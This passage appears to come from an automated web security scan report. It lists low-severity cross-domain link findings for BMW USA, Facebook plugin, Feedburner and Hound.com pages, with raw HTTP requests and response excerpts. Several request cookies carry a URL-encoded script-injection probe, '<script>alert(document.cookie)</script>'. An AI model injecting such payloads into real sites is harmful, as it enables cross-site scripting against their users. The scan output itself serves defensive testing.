<TITLE>Attorney Jobs, Law Jobs, Legal Jobs, Legal Recruiter, Legal Search Firm
...[SNIP]...
<br style="line-height:8px;"><a href="http://www.jdjournal.com/" target="_blank"><img src="http://www.bcgsearch.com/images/logo_jdjournal.jpg" border="0" alt="JD Journal" align="right" style="border:1px solid #cccccc;">
...[SNIP]...
<td width="100%" height="255" valign="top">
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" WIDTH="217" HEIGHT="250">
<param name="movie" value="http://www.bcgsearch.com/images/main.swf">
...[SNIP]...
<li><a href='http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/' rel='bookmark' title='Permanent Link: Do Not Stop Seeing Opportunity: Step Outside Your Mind’s Comfort Zone and Begin to Dream'>Do Not Stop Seeing Opportunity: Step Outside Your Mind’s Comfort Zone and Begin to Dream</a>
...[SNIP]...
<li><a href='http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/' rel='bookmark' title='Permanent Link: Push Yourself Outside Your Comfort Zone'>Push Yourself Outside Your Comfort Zone</a>
...[SNIP]...
<br style="line-height:5px;"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<br style="line-height:5px;">
<a href="http://twitter.com/BCGAttorneyJobs" target="_blank"><img src="http://www.bcgsearch.com/images/twitter.jpg" border="0" alt="Twitter" hspace="10">
...[SNIP]...
<td>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FBCGSearch&layout=standard&show_faces=true&width=250&action=like&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:250px; height:80px;" allowTransparency="true"></iframe>
...[SNIP]...
</a> | 
<a href="http://www.lawcrossing.com/" target="_blank">Legal Jobs</a>
...[SNIP]...
<br>
<a href="http://www.attorneyresume.com/" target="_blank">Legal Resumes</a> | 
<a href="http://www.legalauthority.com/" target="_blank">Resume Distribution</a> | 
<a href="http://www.lateralattorneyreport.com/" target="_blank">Lateral Attorney Report</a> | 
<a href="http://www.judged.com/" target="_blank">Law Firm News</a> | 
<a href="http://www.jd2b.com/" target="_blank">Law School Blog</a> | 
<a href="http://www.jdjournal.com/" target="_blank">Legal News</a>
...[SNIP]...
<br>
<a href="http://www.hound.com/" target="_blank">Job Search Engine</a> | 
<a href="http://www.aharrisonbarnes.com/" target="_blank">Career Advice</a>
...[SNIP]...
<td align="center">
<a href="http://www.employmentresearchinstitute.com/" target="_blank"><img src="http://www.bcgsearch.com/images/logo_es.jpg" width="164" height="50" border="0" alt="Employment Research Institute" title="Employment Research Institute">
...[SNIP]...

14.5. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/Secured/Content/Forms/Login.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK

The response contains the following link to another domain:

https://com-bmwusa.netmng.com/

Request

Response

14.6. http://www.facebook.com/BMWUSA previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/BMWUSA

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/BMWUSA?v=app_4949752878

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yP/r/8xr7FhyZNob.css
http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css
http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css
http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js
http://static.ak.fbcdn.net/rsrc.php/yi/r/oPbBLZNMjVJ.css
http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png

Request

GET /BMWUSA?v=app_4949752878 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=85x21; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=T_nuM; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 19:52:03 GMT
Content-Length: 37296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/oPbBLZNMjVJ.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yP/r/8xr7FhyZNob.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>

<link rel="alternate" type="application/rss+xml" title="BMW USA" href="/feeds/page.php?format=atom10&id=309506851302"/>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

14.7. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fweekendedition.news.yahoo.com&layout=button_count&show_faces=false&width=85&action=like&colorscheme=light&height=21

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yU/r/jKqmG9e3p5H.css
http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

Response

14.8. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.jdjournal.com%2F&layout=standard&show_faces=true&width=450&action=like&font=arial&colorscheme=light&height=80

The response contains the following links to other domains:

http://d.static.ak.fbcdn.net/rsrc.php/yV/r/u2XEW2M3uCu.css
http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.jdjournal.com%2F&layout=standard&show_faces=true&width=450&action=like&font=arial&colorscheme=light&height=80 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=85x21; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS;

Response

14.9. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FJD2B%2F298408284363&width=557&colorscheme=light&connections=100&stream=true&header=true&height=557

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yf/r/Pp-oQmFcGTc.css
http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif
http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css
http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
http://e.static.ak.fbcdn.net/rsrc.php/yH/r/eIpbnVKI9lR.png
http://e.static.ak.fbcdn.net/rsrc.php/yo/r/wqv1o-EUF6N.css
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs268.snc3/23105_100000786097800_5420_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs328.snc4/41514_1210926416_5111923_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs464.snc4/50291_298408284363_7854726_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs846.snc4/70762_1020382471_2571211_q.jpg
http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif
http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FJD2B%2F298408284363&width=557&colorscheme=light&connections=100&stream=true&header=true&height=557 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 22:26:24 GMT
Content-Length: 13851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/yo/r/wqv1o-EUF6N.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yf/r/Pp-oQmFcGTc.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/pages/JD2B/298408284363" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs464.snc4/50291_298408284363_7854726_q.jpg" alt="JD2B" /></a>
...[SNIP]...
<div class="page_stream_short" id="stream_content"><img class="loader img" src="http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/EmploymentXing" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs846.snc4/70762_1020382471_2571211_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000786097800" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs268.snc3/23105_100000786097800_5420_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000833895090" target="_blank"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1383263125" target="_blank"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/piyush.v.bhatt" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs328.snc4/41514_1210926416_5111923_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://e.static.ak.fbcdn.net/rsrc.php/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

14.10. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?href=http://www.facebook.com/pages/JD2B/298408284363&width=557&colorscheme=light&connections=100&stream=true&header=true&height=557

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yL/r/xmHI_BAWBjI.css
http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif
http://b.static.ak.fbcdn.net/rsrc.php/ys/r/IlU90aRP2xg.css
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs268.snc3/23105_100000786097800_5420_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs328.snc4/41514_1210926416_5111923_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs464.snc4/50291_298408284363_7854726_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs846.snc4/70762_1020382471_2571211_q.jpg
http://static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif
http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js
http://static.ak.fbcdn.net/rsrc.php/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/yV/r/R3HqmS9o_VJ.css

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Fri, 21 Jan 2011 19:39:58 GMT
Content-Length: 13489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/ys/r/IlU90aRP2xg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yV/r/R3HqmS9o_VJ.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yL/r/xmHI_BAWBjI.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/pages/JD2B/298408284363" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs464.snc4/50291_298408284363_7854726_q.jpg" alt="JD2B" /></a>
...[SNIP]...
<div class="page_stream_short" id="stream_content"><img class="loader img" src="http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000786097800" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs268.snc3/23105_100000786097800_5420_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000833895090" target="_blank"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/EmploymentXing" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs846.snc4/70762_1020382471_2571211_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/piyush.v.bhatt" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs328.snc4/41514_1210926416_5111923_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1383263125" target="_blank"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

14.11. http://www.feedburner.com/fb/a/emailverifySubmit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.feedburner.com
Path:	/fb/a/emailverifySubmit

Issue detail

The page was loaded from a URL containing a query string:

http://www.feedburner.com/fb/a/emailverifySubmit?feedId=

The response contains the following link to another domain:

http://feedburner.google.com/fb/a/legacysubscribe

Request

GET /fb/a/emailverifySubmit?feedId= HTTP/1.1
Host: www.feedburner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: http://feedburner.google.com/fb/a/legacysubscribe
Date: Fri, 21 Jan 2011 19:34:50 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Set-Cookie: S=feedburner-control-panel=Xid4qVXoZ7IXqezDQPe2_A; Path=/; HttpOnly
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="http://feedburner.google.com/fb/a/legacysubscribe">here</A>
...[SNIP]...

14.12. http://www.hound.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hound.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.hound.com/?utm_source=JDJournal&utm_medium=Banner&utm_campaign=125x125\

The response contains the following links to other domains:

http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=220&n=a05799fd
http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=291&n=a833910f&
http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=322&n=a3204923&
http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=364&n=af9eda74&
http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=370&n=afc72c08&
http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=371&n=a661161a&
http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=380&n=a4307d91&amp
http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a05799fd&cb=112247
http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a3204923&cb=562589
http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a4307d91&cb=554525
http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a661161a&cb=235269
http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a833910f&cb=745457
http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=af9eda74&cb=965659
http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=afc72c08&cb=562547
http://srvr12.pdcsrvr.com/media/www/empsc/f1.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://twitter.com/Hound_jobsearch
http://twitter.com/aharrisonbarnes
http://www.aharrisonbarnes.com/
http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/
http://www.aharrisonbarnes.com/hb-course/
http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js
http://www.attorneyresume.com/
http://www.bcgsearch.com/
http://www.employmentauthority.com/
http://www.employmentresearchinstitute.com/
http://www.employmentspectator.com/
http://www.facebook.com/pages/Houndcom-Fan-Page/306053987750
http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FHoundcom-Fan-Page%2F306053987750&width=180&colorscheme=light&connections=100&stream=true&header=true&height=610
http://www.google-analytics.com/ga.js
http://www.legalauthority.com/
http://www.preferredresumes.com/
http://www.recruitersubmitter.com/
http://www.resumeboomer.com/

Request

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=a827dr0sigiku3i02l6760rfb1; path=/; domain=hound.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: country=United+States; expires=Sun, 20-Feb-2011 19:34:57 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 121008

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>The Largest Online Job Search Engine | Jobs from Employers | Hound.com</ti
...[SNIP]...
<br><a href="http://twitter.com/aharrisonbarnes" target="_blank"><img src="http://images.hound.com/new/twitter_followme.jpg" border="0" vspace="3" alt="Follow Me on Twitter" title="Follow Me on Twitter">
...[SNIP]...
<li><a href='http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/' rel='bookmark' title='Permanent Link: Do Not Stop Seeing Opportunity: Step Outside Your Mind...s Comfort Zone and Begin to Dream'>Do Not Stop Seeing Opportunity: Step Outside Your Mind...s Comfort Zone and Begin to Dream</a>
...[SNIP]...
<li><a href='http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/' rel='bookmark' title='Permanent Link: Push Yourself Outside Your Comfort Zone'>Push Yourself Outside Your Comfort Zone</a>
...[SNIP]...
<br style="line-height:10px;">
<script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<li>
<a href="http://www.employmentspectator.com/" target="_blank"><img src="http://images.hound.com/new/logo_employmentspectator1.gif" border="0" alt="Employment News Blog" title="Employment News Blog" align="right" style="margin-left:5px;">
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=afc72c08&cb=562547' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=370&n=afc72c08&' border='0' alt='' /></a>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=af9eda74&cb=965659' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=364&n=af9eda74&' border='0' alt='' /></a>
...[SNIP]...
<td align="center">
<iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FHoundcom-Fan-Page%2F306053987750&width=180&colorscheme=light&connections=100&stream=true&header=true&height=610" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:180px; height:610px;" allowTransparency="true"></iframe>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a4307d91&cb=554525' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=380&n=a4307d91&amp' border='0' alt='' /></a>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a661161a&cb=235269' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=371&n=a661161a&' border='0' alt='' /></a>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a3204923&cb=562589' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=322&n=a3204923&' border='0' alt='' /></a>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a833910f&cb=745457' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=291&n=a833910f&' border='0' alt='' /></a>
...[SNIP]...

<script type='text/javascript' src="http://srvr12.pdcsrvr.com/media/www/empsc/f1.js"></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a05799fd&cb=112247' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=220&n=a05799fd' border='0' alt='' /></a>
...[SNIP]...
<td align="left"><a href="http://www.facebook.com/pages/Houndcom-Fan-Page/306053987750" target="_blank"><img src="http://images.hound.com/new/facebook.jpg" border="0" alt="Facebook" title="Facebook">
...[SNIP]...
<td align="left"><a href="http://twitter.com/Hound_jobsearch" target="_blank"><img src="http://images.hound.com/new/twitter.jpg" border="0" alt="Twitter" title="Twitter">
...[SNIP]...
</a>  |  
<a href="http://www.preferredresumes.com/" target="_blank">Resume Writing Service</a>  |  
<a href="http://www.resumeboomer.com/" target="_blank">Post Resume</a>  |  
<a href="http://www.recruitersubmitter.com/" target="_blank">Send Resume</a>  |  
<a href="http://www.employmentauthority.com/" target="_blank">Resume Distribution</a>  |  
<a href="http://www.aharrisonbarnes.com/" target="_blank">Career Advice</a>  |  
<a href="http://www.aharrisonbarnes.com/hb-course/" target="_blank">Job Search Tips</a>
...[SNIP]...
</a>  |  
<a href="http://www.bcgsearch.com/" target="_blank">Legal Recruiter</a>  |  
<a href="http://www.attorneyresume.com/" target="_blank">Legal Resume Writing</a>  |  
<a href="http://www.legalauthority.com/" target="_blank">Targeted Mailing</a>
...[SNIP]...
<center><a href="http://www.employmentresearchinstitute.com/" target="_blank"><img src="http://images.hound.com/new/logo_eri.jpg" width="160" height="45" border="0" alt="Employment Research Institute" title="Employment Research Institute">
...[SNIP]...

       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

14.13. http://www.lawcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

